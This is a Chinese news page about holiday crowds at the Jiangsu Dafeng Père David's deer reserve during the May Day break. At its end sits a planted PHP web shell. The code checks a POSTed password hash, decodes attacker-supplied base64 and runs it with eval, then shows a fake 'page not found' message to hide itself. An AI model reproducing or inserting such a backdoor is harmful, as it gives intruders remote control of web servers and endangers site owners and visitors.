最新要闻

首页 > 最新要闻 >

    五一长假第二天,央视共同关注江苏大丰麋鹿保护区旅游盛况

               假期难得,天气正好,4月30日,全国大部分地区天气晴好,带动“五一”假日旅游市场持续繁荣。五一假期的第二天,群众出游热情不减,除了前往名胜古迹,名山大川,不少游客选择走出家门,亲近自然,城市周边游、乡村游成为了大家的首选。

    进入五一假期第二天,江苏大丰麋鹿保护区旅游景区的游客激增,小长假前两天,大丰麋鹿保护区共接待游客6万多人次,比去年增长17%。

        江苏大丰麋鹿保护区目前有野生动植物1800多种。长假期间景区增加了多个科普介绍点,让游客了解更多麋鹿故事和湿地知识。游客不仅可以近距离见到真正的麋鹿,而且还可以给他们投喂食物,增加了互动的趣味性,让游客感觉非常开心。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>